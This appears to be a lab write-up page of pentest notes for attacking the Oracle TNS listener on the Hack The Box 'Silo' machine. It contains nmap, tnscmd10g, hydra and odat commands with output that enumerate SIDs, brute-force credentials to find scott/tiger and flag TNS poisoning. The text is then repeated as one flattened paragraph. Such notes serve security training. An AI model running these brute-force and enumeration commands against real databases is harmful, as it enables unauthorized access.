4 :1521 orcale tns listener

$ nmap --script "oracle-tns-version" -p 1521 -T4 -sV silo.htb
PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

# checking with tnscmd10g
$ tnscmd10g status -h silo.htb
sending (CONNECT_DATA=(COMMAND=status)) to silo.htb:1521
writing 89 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))

# more information about error codes
| https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7
# if TNS versions are incompatible using --10G flag

$ tnscmd10g status -h silo.htb --10G
sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to silo.htb:1521
writing 181 bytes
reading
.e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4))))

# listener could not authenticate the user.
# trying to crack the user:pass using hashcat
$ hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 silo.htb oracle-listener
# PREFER RUNNING odat tnscmd -s silo.htb -p 1521 --[command]

$ odat tnscmd -s silo.htb -p 1521 --version
[1] (10.10.10.82:1521): Searching the version of the Oracle database server (10.10.10.82) listening on the port 1521
[+] The remote database version is: '11.2.0.2.0.'
# vulnerable to offline bruteforce

# sid enumeration
$ odat sidguesser -s "silo.htb" -p 1521 [--sids-file=/opt/oracle-tns/sids-oracle.txt]
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

$ hydra -L /opt/oracle-tns/sids-oracle.txt -s 1521 silo.htb oracle-sid
[1521][oracle-sid] host: silo.htb
[1521][oracle-sid] host: silo.htb   login: CLRExtProc
[1521][oracle-sid] host: silo.htb   login: PLSExtProc
[1521][oracle-sid] host: silo.htb   login: XE
1 of 1 target successfully completed, 4 valid passwords found

# time to find out user:pass

# using 0xdf's script
$ python oracle-userpass-brute.py silo.htb oracle_default_userpass.txt
# needs wordlist in format user:pass
Found scott / tiger

[OR]
# needs wordlist in format user/pass
$ sudo odat passwordguesser -s silo.htb -p 1521 -d 'XE' --accounts-file $(pwd)/oracle_default_userpass.txt [--sysdba]

# we can run automatd odat scan
$ odat all -s silo.htb -d XE -U SCOTT -P tiger --sysdba

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[truncated]
# alot of more information

Using https://github.com/quentinhardy/odat#mind-map---odat--oracle-database-pentests
# also https://0xdf.gitlab.io/img/ODAT_main_features_v2.0.jpg

Previous5 sqlplus Next3 :8080 XDB

Last updated 3 years ago

$ nmap --script "oracle-tns-version" -p 1521 -T4 -sV silo.htb PORT STATE SERVICE VERSION 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) # checking with tnscmd10g $ tnscmd10g status -h silo.htb sending (CONNECT_DATA=(COMMAND=status)) to silo.htb:1521 writing 89 bytes reading .a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4)))) # more information about error codes | https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7 # if TNS versions are incompatible using --10G flag $ tnscmd10g status -h silo.htb --10G sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to silo.htb:1521 writing 181 bytes reading .e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4)))) # listener could not authenticate the user. # trying to crack the user:pass using hashcat $ hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 silo.htb oracle-listener # PREFER RUNNING odat tnscmd -s silo.htb -p 1521 --[command] $ odat tnscmd -s silo.htb -p 1521 --version [1] (10.10.10.82:1521): Searching the version of the Oracle database server (10.10.10.82) listening on the port 1521 [+] The remote database version is: '11.2.0.2.0.' # vulnerable to offline bruteforce # sid enumeration $ odat sidguesser -s "silo.htb" -p 1521 [--sids-file=/opt/oracle-tns/sids-oracle.txt] [1] (10.10.10.82:1521): Searching valid SIDs [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'XE' is a valid SID. Continue... [+] 'XEXDB' is a valid SID. Continue... [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB $ hydra -L /opt/oracle-tns/sids-oracle.txt -s 1521 silo.htb oracle-sid [1521][oracle-sid] host: silo.htb [1521][oracle-sid] host: silo.htb login: CLRExtProc [1521][oracle-sid] host: silo.htb login: PLSExtProc [1521][oracle-sid] host: silo.htb login: XE 1 of 1 target successfully completed, 4 valid passwords found # time to find out user:pass # using 0xdf's script $ python oracle-userpass-brute.py silo.htb oracle_default_userpass.txt # needs wordlist in format user:pass Found scott / tiger [OR] # needs wordlist in format user/pass $ sudo odat passwordguesser -s silo.htb -p 1521 -d 'XE' --accounts-file $(pwd)/oracle_default_userpass.txt [--sysdba] # we can run automatd odat scan $ odat all -s silo.htb -d XE -U SCOTT -P tiger --sysdba [1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)? [+] The target is vulnerable to a remote TNS poisoning [truncated] # alot of more information Using https://github.com/quentinhardy/odat#mind-map---odat--oracle-database-pentests # also https://0xdf.gitlab.io/img/ODAT_main_features_v2.0.jpg